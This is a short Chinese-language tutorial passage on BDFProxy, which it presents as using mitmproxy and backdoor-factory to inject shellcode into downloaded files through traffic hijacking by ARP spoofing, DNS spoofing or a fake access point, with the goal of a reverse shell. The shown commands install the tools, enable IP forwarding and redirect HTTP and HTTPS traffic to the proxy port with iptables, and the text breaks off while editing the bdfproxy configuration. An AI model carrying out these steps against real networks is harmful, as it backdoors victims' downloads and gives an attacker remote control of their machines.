前言
Bdfproxy
- 集成mitmproxy
- 基于流量劫持(中间人攻击)动态注入 shellcode (ARP spoof、DNS spoof、Fake AP)
- 启动路由功能进行流量劫持
- 代理端口是8080,故把所有流量都转到8080端口
- 启动bdfproxy,使得shell反弹
1、基于ARP欺骗
#安装
apt install bdfproxy
apt install backdoor-factory
apt install mitmproxy
#修改 IP 转发
sysctl -w net.ipv4.ip_forward=1
#修改 iptables
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080
#修改配置文件
vi /etc/bdfproxy/bdfproxy.cfg
proxyMo